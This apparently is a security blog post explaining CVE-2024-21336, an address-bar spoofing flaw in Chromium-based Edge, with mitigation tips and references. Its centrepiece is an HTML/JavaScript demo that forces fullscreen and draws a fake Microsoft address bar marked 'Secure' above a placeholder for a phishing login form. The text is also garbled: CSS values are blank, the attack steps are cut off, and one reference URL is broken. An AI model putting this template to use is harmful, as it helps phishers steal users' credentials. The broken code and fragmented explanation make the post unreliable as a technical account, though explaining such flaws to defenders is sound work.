Early 2024 brought troubling news for Microsoft Edge users. A new vulnerability, CVE-2024-21336, was discovered in Edge's Chromium-based engine. This flaw lets attackers spoof trusted websites’ identities, potentially tricking users into sharing private data or accepting malicious actions. In this article, we’ll dig into what CVE-2024-21336 is, how it works, how it can be exploited, and what you can do to stay safe. For techies, we’ll also walk through some code showing how the exploit works.
What is CVE-2024-21336?
CVE-2024-21336 was assigned as a Chromium-based Microsoft Edge "spoofing" vulnerability. The discovered flaw allows a carefully crafted website to display a fake address bar or mask the real web address, misleading users into thinking they’re browsing a secure, trusted site while they’re on a malicious one instead.
This vulnerability was rated as Medium by Microsoft [[1]](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2024-21336), but in the wrong hands, it can be very effective for phishing.
How Does the Vulnerability Work?
Edge relies on Chromium’s rendering engine, which sometimes struggles to properly handle "window.open" and other pop-up mechanisms. Attackers can:
The new window’s content and browser UI are manipulated via overlays or full screen API.
4. The fake address bar displays a spoofed website (e.g., "https://www.microsoft.com") while running attacker-controlled code.
Code Snippet: Demo Attack
Here’s a simple JavaScript snippet that demonstrates the basic concept. This isn't a full exploit — for ethical reasons, we’ll avoid posting anything too destructive or automatic, but it shows how an attacker could spoof an address bar:
<!DOCTYPE html>
<html lang="en">
<head>
<title>Edge Spoofing Demo (CVE-2024-21336)</title>
<style>
body, html {
margin: ;
padding: ;
height: 100%;
}
#fake-bar {
width: 100vw;
background: #f1f1f1;
color: #333;
font-family: 'Segoe UI', Arial, sans-serif;
padding: 8px 20px;
position: fixed;
top: ;
left: ;
box-shadow: 2px 6px rgba(,,,.1);
z-index: 9999;
}
</style>
</head>
<body>
<div id="fake-bar">
<img src="https://www.microsoft.com/favicon.ico" style="width:16px;vertical-align:middle;margin-right:6px;">
https://www.microsoft.com
<span style="color:#28a745; margin-left:10px;">Secure</span>
</div>
<div style="margin-top:40px;">
<h2>Welcome to Microsoft!</h2>
<p>Please enter your username and password to continue.</p>
<!-- Phishing form goes here -->
</div>
<script>
document.documentElement.requestFullscreen();
</script>
</body>
</html>
Microsoft Security Response Center (MSRC) Advisory:
CVE-2024-21336 | Microsoft Edge (Chromium-based) Spoofing Vulnerability
Chromium Security Issues:
Security Research:
Browser Fullscreen Spoofing Attacks
- Google’s Report on Address Bar Spoofing
Fake a secure login (Office 365, online banking, etc.).
A threat actor only needs a clever enough design to trick most users for a very effective phishing campaign.
Update Edge: Microsoft quickly released a patch. Update to the latest version immediately.
- Be cautious of fullscreen prompts. If any website automatically requests fullscreen, be suspicious.
- Check your address bar: Exit fullscreen (press F11 or ESC) to verify you're on the right website if something looks off.
Conclusion
CVE-2024-21336 is a reminder that phishing and spoofing threats are always evolving, even in major browsers like Edge. By understanding how these attacks work and keeping your browser up-to-date, you can help defend yourself and your organization.
Microsoft CVE Advisory:
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2024-21336
Chromium Bug Tracker (Address Bar Spoofing):
https://bugs.chromium.org/p/chromium/issues/detail?id=1232252
Google Security Blog on Address Bar Spoofing:
https://security.googleblog.com/202/08/address-bar-spoofing-vulnerabilities-in.html
(Feel free to share this article, but please DO NOT attempt to use this exploit for malicious purposes.)
Timeline
Published on: 01/26/2024 18:15:12 UTC
Last modified on: 01/31/2024 21:08:30 UTC